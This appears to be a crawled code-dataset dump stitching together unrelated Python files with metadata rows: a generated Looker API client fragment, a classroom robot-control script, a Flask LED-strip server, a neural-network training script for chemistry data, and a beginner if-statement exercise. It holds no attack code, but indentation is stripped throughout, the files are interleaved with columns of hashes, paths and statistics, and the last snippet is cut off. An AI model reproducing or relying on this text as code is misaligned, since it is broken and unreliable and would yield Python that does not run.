body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/whitelabel_configuration', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WhitelabelConfiguration', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def versions(self, **kwargs): # noqa: E501
"""Get ApiVersion # noqa: E501
### Get information about all API versions supported by this Looker instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.versions(async=True)
>>> result = thread.get()
:param async bool
:param str fields: Requested fields.
:return: ApiVersion
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.versions_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.versions_with_http_info(**kwargs) # noqa: E501
return data
def versions_with_http_info(self, **kwargs): # noqa: E501
"""Get ApiVersion # noqa: E501
### Get information about all API versions supported by this Looker instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.versions_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str fields: Requested fields.
:return: ApiVersion
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method versions" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/versions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiVersion', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def whitelabel_configuration(self, **kwargs): # noqa: E501
"""Get Whitelabel configuration # noqa: E501
### This feature is enabled only by special license. ### Gets the whitelabel configuration, which includes hiding documentation links, custom favicon uploading, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.whitelabel_configuration(async=True)
>>> result = thread.get()
:param async bool
:param str fields: Requested fields.
:return: WhitelabelConfiguration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.whitelabel_configuration_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.whitelabel_configuration_with_http_info(**kwargs) # noqa: E501
return data
def whitelabel_configuration_with_http_info(self, **kwargs): # noqa: E501
"""Get Whitelabel configuration # noqa: E501
### This feature is enabled only by special license. ### Gets the whitelabel configuration, which includes hiding documentation links, custom favicon uploading, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.whitelabel_configuration_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str fields: Requested fields.
:return: WhitelabelConfiguration
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method whitelabel_configuration" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/whitelabel_configuration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WhitelabelConfiguration', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 38.761641
| 518
| 0.610846
| 3,856
| 34,963
| 5.304461
| 0.060944
| 0.053193
| 0.024641
| 0.031681
| 0.953065
| 0.951843
| 0.946025
| 0.939718
| 0.936443
| 0.922607
| 0
| 0.017626
| 0.300604
| 34,963
| 901
| 519
| 38.804661
| 0.818836
| 0.058405
| 0
| 0.82881
| 0
| 0
| 0.170304
| 0.04815
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.008351
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5184d0161aea91229d845f24bc5e40026756eea2
| 6,396
|
py
|
Python
|
src/m2_extra.py
|
brutchjd/99-CapstoneProject-201920
|
1208252bab3aeb95fca0529f3f983854ac9efd89
|
[
"MIT"
] | null | null | null |
src/m2_extra.py
|
brutchjd/99-CapstoneProject-201920
|
1208252bab3aeb95fca0529f3f983854ac9efd89
|
[
"MIT"
] | null | null | null |
src/m2_extra.py
|
brutchjd/99-CapstoneProject-201920
|
1208252bab3aeb95fca0529f3f983854ac9efd89
|
[
"MIT"
] | null | null | null |
"""
Capstone Project. Code to call functions for sprint 3.
Authors: Your professors (for the framework)
and Nathaniel Craan
Winter term, 2018-2019.
"""
import rosebot
import time
#import tkinter
#from tkinter import ttk
#import m2_run_this_on_laptop as m2L
def m2_pickup_beep(rate):
robot = rosebot.RoseBot()
go_until_distance_is_within_beep(robot, 2, 0, 25, rate)
robot.arm_and_claw.raise_arm()
def m2_camera_clockwise(speed, area):
robot = rosebot.RoseBot()
robot.drive_system.spin_clockwise_until_sees_object(speed, area)
robot.drive_system.right_motor.turn_on(speed)
while True:
object_x = robot.sensor_system.camera.get_biggest_blob().center.x
if object_x > 150 and object_x < 200:
robot.drive_system.right_motor.turn_off()
break
m2_pickup_beep(10)
def m2_camera_counterclockwise(speed, area):
robot = rosebot.RoseBot()
robot.drive_system.spin_counterclockwise_until_sees_object(speed, area)
robot.drive_system.left_motor.turn_on(speed)
while True:
object_x = robot.sensor_system.camera.get_biggest_blob().center.x
if object_x > 150 and object_x < 200:
robot.drive_system.left_motor.turn_off()
break
m2_pickup_beep(10)
def go_until_distance_is_within_beep(robot, delta, inches, speed, rate):
start = robot.sensor_system.ir_proximity_sensor.get_distance_in_inches()
print(start)
if start > inches + delta:
robot.drive_system.go(speed, speed)
while True:
test = robot.sensor_system.ir_proximity_sensor.get_distance_in_inches()
distance = robot.sensor_system.ir_proximity_sensor.get_distance_in_inches()
robot.sound_system.beeper.beep()
time.sleep(1 / (rate *(distance + 0.00001)))
print(test)
if test >= (inches - delta) and test <= (inches + delta):
print(test)
robot.drive_system.left_motor.turn_off()
robot.drive_system.right_motor.turn_off()
break
if start < inches + delta:
robot.drive_system.go(-1 * speed, -1 * speed)
while True:
test = robot.sensor_system.ir_proximity_sensor.get_distance_in_inches()
distance = robot.sensor_system.ir_proximity_sensor.get_distance_in_inches()
robot.sound_system.beeper.beep()
time.sleep(1 / (rate *(distance + 0.00001)))
print(test)
if test >= (inches - delta) and test <= (inches + delta):
print(test)
robot.drive_system.left_motor.turn_off()
robot.drive_system.right_motor.turn_off()
break
def map_rectangle(speed, width, length, loops):
robot = rosebot.RoseBot()
while True:
if robot.sensor_system.color_sensor.get_color_as_name() == 'Blue' or robot.sensor_system.color_sensor.get_color() == 2:
#object_x = robot.sensor_system.camera.get_biggest_blob().center.x
#if object_x > 150 and object_x < 200:
robot.drive_system.go_until_distance_is_within(2, 0, 25)
robot.arm_and_claw.raise_arm()
for k in range(loops):
for _ in range(2):
robot.drive_system.go_straight_for_inches_using_encoder(length, speed)
robot.drive_system.left_motor.turn_on(speed)
robot.drive_system.right_motor.turn_on(-1 * speed)
start = time.time()
while True:
current = time.time()
if current - start >= 0.75:
break
robot.drive_system.left_motor.turn_off()
robot.drive_system.right_motor.turn_off()
robot.drive_system.go_straight_for_inches_using_encoder(width, speed)
robot.drive_system.left_motor.turn_on(speed)
robot.drive_system.right_motor.turn_on(-1 * speed)
start = time.time()
while True:
current = time.time()
if current - start >= 0.75:
break
robot.drive_system.left_motor.turn_off()
robot.drive_system.right_motor.turn_off()
break
def map_triangle(speed, length, loops):
robot = rosebot.RoseBot()
while True:
if robot.sensor_system.color_sensor.get_color_as_name() == 'Blue' or robot.sensor_system.color_sensor.get_color() == 2:
#object_x = robot.sensor_system.camera.get_biggest_blob().center.x
#if object_x > 150 and object_x < 200:
robot.drive_system.go_until_distance_is_within(2, 0, 25)
robot.arm_and_claw.raise_arm()
for k in range(loops):
for _ in range(2):
robot.drive_system.go_straight_for_inches_using_encoder(length, speed)
robot.drive_system.left_motor.turn_on(speed)
robot.drive_system.right_motor.turn_on(-1 * speed)
start = time.time()
while True:
current = time.time()
if current - start >= 1:
break
robot.drive_system.left_motor.turn_off()
robot.drive_system.right_motor.turn_off()
break
def map_circle(speed, length, loops, duration):
robot = rosebot.RoseBot()
while True:
if robot.sensor_system.color_sensor.get_color_as_name() == 'Blue' or robot.sensor_system.color_sensor.get_color() == 2:
robot.drive_system.go_until_distance_is_within(2, 0, 25)
robot.arm_and_claw.raise_arm()
for k in range(loops):
robot.drive_system.go_straight_for_inches_using_encoder(length, speed)
robot.drive_system.left_motor.turn_on(speed)
robot.drive_system.right_motor.turn_on(-1 * speed)
start = time.time()
while True:
current = time.time()
if current - start >= 5:
break
robot.drive_system.right_motor.turn_off()
robot.drive_system.left_motor.turn_off()
break
| 39.481481
| 127
| 0.599124
| 790
| 6,396
| 4.541772
| 0.140506
| 0.097547
| 0.156076
| 0.070234
| 0.878763
| 0.878763
| 0.872352
| 0.853122
| 0.801282
| 0.746934
| 0
| 0.021141
| 0.312226
| 6,396
| 161
| 128
| 39.726708
| 0.794499
| 0.066448
| 0
| 0.818182
| 0
| 0
| 0.002018
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057851
| false
| 0
| 0.016529
| 0
| 0.07438
| 0.041322
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51c2d0a71d3bc4b147839ea7ea39d280618c757f
| 2,284
|
py
|
Python
|
Iris>LightServer/test.py
|
rrbutani/Iris
|
e3a61530a763387e99fd3107a90fdb3d160f6ead
|
[
"Unlicense"
] | null | null | null |
Iris>LightServer/test.py
|
rrbutani/Iris
|
e3a61530a763387e99fd3107a90fdb3d160f6ead
|
[
"Unlicense"
] | 1
|
2021-02-08T20:15:49.000Z
|
2021-02-08T20:15:49.000Z
|
Iris>LightServer/test.py
|
rrbutani/Iris
|
e3a61530a763387e99fd3107a90fdb3d160f6ead
|
[
"Unlicense"
] | 1
|
2016-05-23T17:09:28.000Z
|
2016-05-23T17:09:28.000Z
|
from flask import Flask, request
import effects
import lights
import json
print lights.strip.numPixels()
#print json.loads('[16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215]')
for i in range(0, lights.strip.numPixels()):
lights.strip.setPixelColor(i, 0xFF0000)
lights.strip.show()
app = Flask(__name__)
#effects.raw.info()
@app.route('/')
def hello_world():
return 'Hello World!'
@app.route('/api/set/<effect_name>')
def effect_handler(effect_name):
# return request.args['yes']
#return
#input7 = request.args['leds']
#print input7
#print json.loads(request.args['leds'])
#yue = json.loads(input7)#json.loads('[16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 16777215, 1677)
#print yue
if(hasattr(effects, effect_name)):
getattr(effects, effect_name).info()
getattr(effects, effect_name).run(lights.strip, request.args)
return effect_name + 'idiot'
# else:
# return effect_name + ' - no luck'
if __name__ == '__main__' :
app.run(host='0.0.0.0', port=80)
| 57.1
| 1,211
| 0.765762
| 267
| 2,284
| 6.47191
| 0.191011
| 1.287037
| 1.902778
| 2.5
| 0.663194
| 0.663194
| 0.663194
| 0.663194
| 0.663194
| 0.663194
| 0
| 0.563083
| 0.108144
| 2,284
| 39
| 1,212
| 58.564103
| 0.285223
| 0.72373
| 0
| 0
| 0
| 0
| 0.088853
| 0.035541
| 0
| 0
| 0.012924
| 0
| 0
| 0
| null | null | 0
| 0.2
| null | null | 0.05
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
51e9ed7cd6fdaded1114be0c4addf10bc513a6b3
| 9,590
|
py
|
Python
|
activelearning/datareduction/ani_data_reduction.py
|
plin1112/ANI-Tools
|
76280c918fc79fee8c266b8bc9ab57f86104ec99
|
[
"MIT"
] | 8
|
2018-10-30T16:48:44.000Z
|
2021-03-08T01:44:41.000Z
|
activelearning/datareduction/ani_data_reduction.py
|
plin1112/ANI-Tools
|
76280c918fc79fee8c266b8bc9ab57f86104ec99
|
[
"MIT"
] | null | null | null |
activelearning/datareduction/ani_data_reduction.py
|
plin1112/ANI-Tools
|
76280c918fc79fee8c266b8bc9ab57f86104ec99
|
[
"MIT"
] | 5
|
2018-04-05T15:51:12.000Z
|
2019-05-23T21:38:31.000Z
|
import pyanitrainer as atr
import os
# Network 1 Files
wkdir = '/home/jujuman/Research/DataReductionMethods/model_9.0.5_reduce/train/'
cnstf = 'rHCNO-4.6A_16-3.1A_a4-8.params'
saenf = 'sae_6-31gd.dat'
nfdir = 'networks/'
opt = 'active_output.opt'
# Data Dir
datadir = '/home/jujuman/Research/DataReductionMethods/model_9.0.5_reduce/cache/'
testdata = datadir + 'testset/testset.h5'
trainh5 = wkdir + 'ani_red9.0.5_ALfull.h5'
# Test data
test_files = ['/home/jujuman/Research/GDB_Dimer/dimers1_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimers2_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimers3_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimers4_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimers5_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimers6_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimer_gen_7/dimers7.h5',
'/home/jujuman/Research/ReactionGeneration/reactiondata/DA_rxn_1/DA_rxn_1.h5',
'/home/jujuman/Research/ReactionGeneration/reactiondata/DA_rxn_1/DA_rxn_1_2.h5',
'/home/jujuman/Research/ReactionGeneration/reactiondata/comb_rxn_1/comb_rxn_1.h5',
'/home/jujuman/Research/ReactionGeneration/reactiondata/comb_rxn_1/comb_rxn_1_2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb09_1/ani_al-9.0.5.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb09_1/ani_al-9.0.4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb09_1/ani_al-9.0.3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb09_1/ani_al-9.0.2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb09_1/ani_al-9.0.1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_3/gdb_r06_comb08_03_4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_3/gdb_r06_comb08_03_3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_3/gdb_r06_comb08_03_2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_3/gdb_r06_comb08_03_1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_2/gdb_r06_comb08_02_4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_2/gdb_r06_comb08_02_3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_2/gdb_r06_comb08_02_2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_2/gdb_r06_comb08_02_1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_1/gdb_r06_comb08_5.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_1/gdb_r06_comb08_4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_1/gdb_r06_comb08_3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_1/gdb_r06_comb08_2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_1/gdb_r06_comb08_1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_mdal_resample/mdal.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/h2o_cluster/h2o_nms_clusters.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-05_red03-05/confs_cv_gdb01-05_rs1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-05_red03-05/confs_cv_gdb01-05_rs2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-05_red03-05/confs_cv_gdb01-05_rs3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-05_red03-05/confs_cv_gdb01-05_rs4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-06/confs_cv_gdb01-06_rs1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-06/confs_cv_gdb01-06_rs2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-06/confs_cv_gdb01-06_rs3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-06/confs_cv_gdb01-06_rs4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-07/confs_cv_gdb01-07_rs1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-07/confs_cv_gdb01-07_rs2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-07/confs_cv_gdb01-07_rs3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-07/confs_cv_gdb01-07_rs4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-08/confs_cv_gdb01-08_rs1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-08/confs_cv_gdb01-08_rs2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-08/confs_cv_gdb01-08_rs3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-08/confs_cv_gdb01-08_rs4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S01_06r.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S02_06r.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S03_06r.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S04_06r.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S05_06r.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S06_06r.h5',
]
#---- Parameters ----
GPU = 0 # GPU ID
LR = 0.001 # Initial learning rate
LA = 0.25 # LR annealing
CV = 1.0e-6 # LR converg
ST = 100 # ????
M = 0.34 # Max error per atom in kcal/mol
P = 0.01 # Percent to keep
ps = 20 # Print step
Naev = 384 #
sinet= False
#--------------------
# Training varibles
d = dict({'wkdir' : wkdir,
'sflparamsfile' : cnstf,
'ntwkStoreDir' : wkdir+'networks/',
'atomEnergyFile': saenf,
'datadir' : datadir,
'tbtchsz' : '1024',
'vbtchsz' : '1024',
'gpuid' : str(GPU),
'ntwshr' : '0',
'nkde' : '2',
'force' : '0',
'fmult' : '0.01',
'runtype' : 'ANNP_CREATE_HDNN_AND_TRAIN',
'adptlrn' : 'OFF',
'moment' : 'ADAM',})
l1 = dict({'nodes' : '128',
'activation' : '5',
'maxnorm' : '1',
'norm' : '3.0',
'btchnorm' : '0',})
l2 = dict({'nodes' : '128',
'activation' : '5',
'maxnorm' : '1',
'norm' : '3.0',
'btchnorm' : '0',})
l3 = dict({'nodes' : '64',
'activation' : '5',
'maxnorm' : '1',
'norm' : '3.0',
'btchnorm' : '0',})
l4 = dict({'nodes' : '1',
'activation' : '6',})
layers = [l1, l2, l3, l4,]
aani = atr.ActiveANI(test_files, wkdir+saenf, wkdir+opt, datadir, testdata, Naev)
aani.init_dataset(P)
inc = 0
while aani.get_percent_bad() > 5.0:
# Remove existing network
network_files = os.listdir(wkdir + 'networks/')
for f in network_files:
os.remove(wkdir + 'networks/' + f)
# Setup trainer
tr = atr.anitrainer(d,layers)
# Train network
tr.train_network(LR, LA, CV, ST, ps)
# Write the learning curve
tr.write_learning_curve(wkdir+'learning_curve_'+str(inc)+'.dat')
# Test network
ant = atr.anitester(wkdir+cnstf, wkdir+saenf, wkdir+nfdir, GPU, sinet)
test_rmse_e, test_rmse_f = ant.compute_test(testdata)
print('Test E RMSE:', "{:.3f}".format(test_rmse_e), 'kcal/mol')
print('Test F RMSE:', "{:.3f}".format(test_rmse_f), 'kcal/mol/A')
# Check for and add bad data
aani.add_bad_data(wkdir+cnstf, wkdir+saenf, wkdir+nfdir, GPU, sinet, P=0.01 + inc * 0.01, M=M)
inc = inc + 1
aani.add_bad_data(wkdir + cnstf, wkdir + saenf, wkdir + nfdir, GPU, sinet, P=1.0, M=M)
aani.store_train_h5(trainh5)
# Remove existing network
network_files = os.listdir(wkdir + 'networks/')
for f in network_files:
os.remove(wkdir + 'networks/' + f)
# Setup trainer
tr = atr.anitrainer(d, layers)
# Train network
tr.train_network(LR, LA, CV, ST, ps)
# Test network
ant = atr.anitester(wkdir + cnstf, wkdir + saenf, wkdir + nfdir, GPU, sinet)
test_rmse = ant.compute_test(testdata)
print('Final Test RMSE:', "{:.3f}".format(test_rmse), 'kcal/mol')
o = open(wkdir + 'keep_info.dat', 'w')
for k in aani.get_keep_info():
o.write(str(int(k[1])) + ' : ' + str(k[0]) + '\n')
f = open(wkdir + 'diffs.dat', 'w')
for K in aani.get_diff_kept (wkdir + cnstf, wkdir + saenf, wkdir + nfdir, GPU, sinet, M=M):
string = ""
for k in K:
string = string + "{:.7f}".format(k) + ','
f.write(string[:-1] + '\n')
| 51.55914
| 131
| 0.663191
| 1,427
| 9,590
| 4.192011
| 0.155571
| 0.101137
| 0.174691
| 0.182548
| 0.801739
| 0.778168
| 0.778168
| 0.740221
| 0.727516
| 0.703611
| 0
| 0.119841
| 0.189051
| 9,590
| 185
| 132
| 51.837838
| 0.649351
| 0.040667
| 0
| 0.169014
| 0
| 0.239437
| 0.607587
| 0.550796
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014085
| 0
| 0.014085
| 0.021127
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a400ea67456922121b72684564d665fa4da0f1de
| 156
|
py
|
Python
|
src/utils/extractors.py
|
abdellatifLabr/social-media-stocks-tracker
|
b54f1db488d8b26e292ec025d1af7f8d4b5a94da
|
[
"MIT"
] | null | null | null |
src/utils/extractors.py
|
abdellatifLabr/social-media-stocks-tracker
|
b54f1db488d8b26e292ec025d1af7f8d4b5a94da
|
[
"MIT"
] | null | null | null |
src/utils/extractors.py
|
abdellatifLabr/social-media-stocks-tracker
|
b54f1db488d8b26e292ec025d1af7f8d4b5a94da
|
[
"MIT"
] | null | null | null |
import re
def extract_tickers(text, stock_symbol_length, *args, **kwargs):
return re.findall('([$][A-Za-z]{' + stock_symbol_length + '})[\S]*', text)
| 26
| 78
| 0.653846
| 22
| 156
| 4.409091
| 0.772727
| 0.226804
| 0.350515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128205
| 156
| 5
| 79
| 31.2
| 0.713235
| 0
| 0
| 0
| 0
| 0
| 0.128205
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
32263a3ab6072475de7cd528895f9bbf02dc912b
| 168
|
py
|
Python
|
predavanje3/uvjetna_naredba_if.py
|
Miillky/uvod_u_programiranje
|
209611e38c8fe84c727649df4b868a4278eb77c3
|
[
"MIT"
] | null | null | null |
predavanje3/uvjetna_naredba_if.py
|
Miillky/uvod_u_programiranje
|
209611e38c8fe84c727649df4b868a4278eb77c3
|
[
"MIT"
] | null | null | null |
predavanje3/uvjetna_naredba_if.py
|
Miillky/uvod_u_programiranje
|
209611e38c8fe84c727649df4b868a4278eb77c3
|
[
"MIT"
] | null | null | null |
if 5<6:
print('Linija1')
print('Linija2')
print("Linija3")
print("Linija4")
if 5>6:
print("Linija1")
print("Linija2")
print("Linija3")
print("Linija4")
| 15.272727
| 20
| 0.619048
| 22
| 168
| 4.727273
| 0.363636
| 0.057692
| 0.076923
| 0.173077
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.085714
| 0.166667
| 168
| 11
| 21
| 15.272727
| 0.657143
| 0
| 0
| 0.4
| 0
| 0
| 0.331361
| 0
| 0
| 0
| 0
| 0
